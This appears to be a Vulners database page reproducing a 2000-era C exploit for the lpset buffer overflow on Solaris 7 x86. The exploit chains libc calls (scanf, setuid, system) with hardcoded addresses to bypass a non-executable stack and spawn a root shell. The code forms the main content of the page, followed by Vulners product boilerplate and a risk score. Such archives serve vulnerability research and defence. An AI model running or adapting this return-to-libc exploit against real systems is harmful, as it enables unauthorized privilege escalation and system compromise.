Vulners
Lucene search
lpset.overflow
`Here's an overflow exploit that works on a non-exec stack on x86 boxes.
It demonstrates how it is possible to thread together several libc
calls. I have not seen any other exploits for x86 that have done this..
for the lpset bug in sol7 x86.
Tim N.
#define BASE 0xdff40000
#define STACK 0x8047e30
#define BUFSIZE 36
#define SYSTEM (BASE + 0x5b328)
#define SCANF (BASE + 0x5ae80)
#define SETUID (BASE + 0x30873)
#define PERCD (BASE + 0x83754)
#define BINSH (BASE + 0x83654)
#define POP3 (SYSTEM + 610)
#define POP2 (SYSTEM + 611)
#define POP1 (SYSTEM + 612)
int
main()
{
unsigned char expbuf[1024];
char *env[1];
int *p, i;
memset(expbuf, 'a', BUFSIZE);
p = (int *)(expbuf + BUFSIZE);
*p++ = STACK;
*p++ = SCANF + 1;
*p++ = STACK + 6 * 4;
*p++ = POP2;
*p++ = PERCD;
*p++ = STACK + 9 * 4;
*p++ = STACK + 10 * 4;
*p++ = SETUID;
*p++ = POP1;
*p++ = 0x33333333;
*p++ = STACK + 15 * 4;
*p++ = SYSTEM;
*p++ = 0x33333333;
*p++ = BINSH;
*p = 0;
env[0] = 0;
execle("/bin/lpset", "/bin/lpset", "-n", "fns", "-r", expbuf, "123", 0,
env);
return 0;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 May 2000 00:00Current
7.4High risk
Vulners AI Score7.4